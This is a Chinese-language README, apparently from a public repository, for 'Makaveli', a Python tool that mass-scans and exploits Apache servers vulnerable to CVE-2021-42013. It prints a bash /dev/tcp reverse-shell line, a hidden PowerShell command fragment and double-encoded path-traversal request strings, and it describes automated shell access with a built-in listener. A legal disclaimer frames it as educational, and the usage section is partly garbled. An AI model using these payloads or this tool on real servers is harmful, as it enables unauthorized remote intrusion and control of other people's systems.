一款先进的扫描、利用和远程交互工具,旨在检测和利用配置不当的服务器中的Apache路径遍历+远程代码执行漏洞(CVE-2021-42013)。
# 🔥 CVE-2021-42013 漏洞利用框架 — Makaveli
> 💀 多维宇宙黑客模式已激活...
一款先进的扫描、利用和远程交互工具,旨在检测并利用错误配置服务器中的 **Apache 路径遍历 + RCE(CVE-2021-42013)** 漏洞。
---
## ⚠️ 法律警告
> 本软件仅用于受控环境下的教育和研究目的。
在未获得明确授权的情况下使用本工具攻击系统可能违法,并在许多国家构成犯罪。
作者不对任何滥用此代码的行为负责。请自行承担风险,并始终获得目标系统所有者的明确许可。
---
🧠 技术描述
本工具可:
- ✅ 从 `.txt` 文件扫描多个目标。
- ✅ 自动检测 CVE-2021-42013 漏洞存在。
- ✅ 识别远程操作系统(Linux 或 Windows)。
- ✅ 根据检测到的系统发送定制化 Payload。
- ✅ 建立反向 Shell 并获取远程访问权限。
- ✅ 通过内置监听器实时交互。
- ✅ 提供高级日志、进度条和交互菜单。
---
## 🔧 环境要求
- Python **3.8+**
- 基于 Unix/Linux/MacOS 的系统(使用 `subprocess` 和 `curl`)
- 需要以下 Python 库:
```bash
pip install -r requirements.txt
requirements.txt
rich
alive-progress
同时需要在操作系统中安装 curl。
.
├── POC-CVE.py # 主脚本
├── logs.txt # 自动生成的日志文件
├── requirements.txt # Python 依赖
└── targets.txt # (可选)待扫描的 URL 列表
python3 POC-CVE.py
选择以下选项:
scan_file:从文件扫描多个 URL,显示哪些存在漏洞。exploit:直接攻击单个目标,建立反向 Shell。exit:退出交互模式。http://example.com
http://victim.net
http://192.168.1.100
python3 POC-CVE.py
选择 scan_file 并输入:
exploit。LHOST)LPORT)脚本会:
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
powershell -NoP -NonI -W Hidden -Command ...
/.%252e/.%252e/.%252e)curl 进行命令注入User-Agent、Accept 等)GET /cgi-bin/.%%32%65/.%%32%65/...本项目“按原样”提供,不附带任何担保,也不对因使用造成的损害承担责任。 切勿在未获得所有者明确同意的情况下扫描或攻击任何系统。
---